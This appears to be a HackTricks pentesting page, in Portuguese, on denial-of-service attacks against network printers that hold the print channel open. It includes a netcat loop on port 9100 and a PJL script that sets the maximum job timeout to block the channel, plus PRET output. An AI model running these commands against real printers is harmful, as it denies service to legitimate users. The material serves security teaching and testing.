hacktricks/network-services-pentesting/pentesting-printers/transmission-channel.md

4 KiB
Raw Blame History

Aprenda hacking em AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras formas de apoiar o HackTricks:

Se os trabalhos de impressão são processados em série o que se assume para a maioria dos dispositivos apenas um trabalho pode ser tratado por vez. Se este trabalho não terminar efetivamente, o canal de impressão fica bloqueado até que um timeout seja acionado, impedindo que usuários legítimos imprimam.

DoS Básico:

while true; do nc printer 9100; done

Este ataque trivial de negação de serviço pode ser aprimorado definindo um valor alto de timeout com PJL, assim o número de conexões que um atacante precisa fazer é minimizado enquanto fica ainda mais difícil para usuários legítimos conseguirem um intervalo de tempo livre:

# get maximum timeout value with PJL
MAX="`echo "@PJL INFO VARIABLES" | nc -w3 printer 9100 |\
grep -E -A2 '^TIMEOUT=' | tail -n1 | awk '{print $1}'`"
# connect and set maximum timeout for current job with PJL
while true; do echo "@PJL SET TIMEOUT=$MAX" | nc printer 9100; done

Você pode usar o PRET para encontrar as configurações de timeout:

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> env timeout
TIMEOUT=15 [2 RANGE]
5
300

Enquanto a referência PJL especifica um tempo máximo de espera de 300 segundos, na prática os tempos máximos de espera PJL podem variar de 15 a 2147483 segundos. Observe que mesmo os trabalhos de impressão recebidos de outros canais de impressão como IPP ou LPD não são mais processados enquanto a conexão permanecer aberta.

Saiba mais sobre este ataque em http://hacking-printers.net/wiki/index.php/Transmission_channel

Aprenda hacking em AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras formas de apoiar o HackTricks: